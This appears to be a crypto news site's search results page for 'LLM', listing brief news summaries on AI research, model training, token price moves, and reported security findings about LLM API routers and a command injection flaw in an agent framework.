Search results for "LLM"
Today
05:14
1

Ramp Labs proposes a new solution for shared multi-agent memory, with the highest Token consumption reduced by 65%

Ramp Labs research output “Latent Briefing” achieves efficient memory sharing across multi-agent systems by compressing the LLM KV cache, reducing Token consumption and improving accuracy. In LongBench v2 testing, this approach successfully reduced Worker model Token consumption by 65% and improved overall accuracy by about 3 percentage points, with compression taking only 1.7 seconds. This technology performs exceptionally well across different document scenarios.
More
06:17

Solayer’s founder releases research on LLM supply chain security; more than 2% of free routers have been exposed as having been maliciously injected

Solayer’s founder reveals safety risks of large language models, pointing out that LLM agents relying on third-party API routers face a risk of being attacked by malicious code. Testing shows that multiple routers have security vulnerabilities, and can even leak sensitive credentials. In addition, research demonstrates feasible attack methods and defense measures.
More
ETH2,38%
02:38

PIPPIN (pippin) rose 20.56% in the last 24 hours

Gate News update: On April 2, according to Gate market data, as of the time of writing, PIPPIN (pippin) is trading at $0.0603. Over the past 24 hours, it is up 20.56%, with a high of $0.0779 and a low of $0.0499. The 24-hour trading volume is $21.2392 million. Its current market cap is approximately $60.3162 million. Pippin is an SVG unicorn drawn using the latest LLM benchmark from ChatGPT 4o. Pippin was created by Yohei Nakajima, a widely recognized innovator and thought leader in the AI VC space. He is known for his public-building approach, and has been at the forefront of the "AI for VC" movement
More
PIPPIN-3,67%
13:08

Tether introduces the BitNet LoRA framework, supporting large model training on mobile devices

Gate News report: On March 17, Tether's QVAC Fabric launched the world's first cross-platform LoRA fine-tuning framework for Microsoft BitNet (1-bit LLM), significantly lowering the VRAM and computational thresholds for large model training. The framework supports LoRA fine-tuning and inference acceleration on Intel, AMD, Apple Silicon M series, and mobile GPUs (including Adreno, Mali, and Apple Bionic).
More
11:02

China Academy of Information and Communications Technology Jointly Discovers and Fixes OpenClaw Critical Command Injection Vulnerability

The China Academy of Information and Communications Technology and academic teams discovered an LLM-driven command injection vulnerability in the bash-tools module of the open-source framework OpenClaw during an audit. Attackers can induce command execution to run remote code and steal data. The vulnerability disclosure process has been initiated and fix recommendations have been submitted.
More
06:07

Bittensor Subnet Completes 72 Billion Parameter LLM Pretraining, TAO Rises 54.8% in Two Weeks

Bittensor subnet Templar completed pretraining of Covenant-72B, a decentralized language model with 72 billion parameters, on March 10th. The model demonstrated excellent performance on MMLU tests, surpassing multiple centralized baseline models. The project attracted collaboration from over 70 nodes, with all weights and checkpoints released under the Apache License. Following this news, Bittensor and its token experienced broad gains.
More
TAO1,61%
03:37

ETH Zurich Practical Test of AI Agent Blockchain Consensus Ability: Success Rate Only 41.6%

The ETH Zurich research team tested the Byzantine consensus capability of LLM Agents and found that even without malicious nodes, the effective consensus rate was only 41.6%. As the number of nodes increases, reaching agreement becomes more difficult, and the situation worsens further with the addition of malicious nodes. The study concludes that current LLM Agents are not yet reliable for secure consensus, and decentralized deployment should be approached with caution.
More
ETH2,38%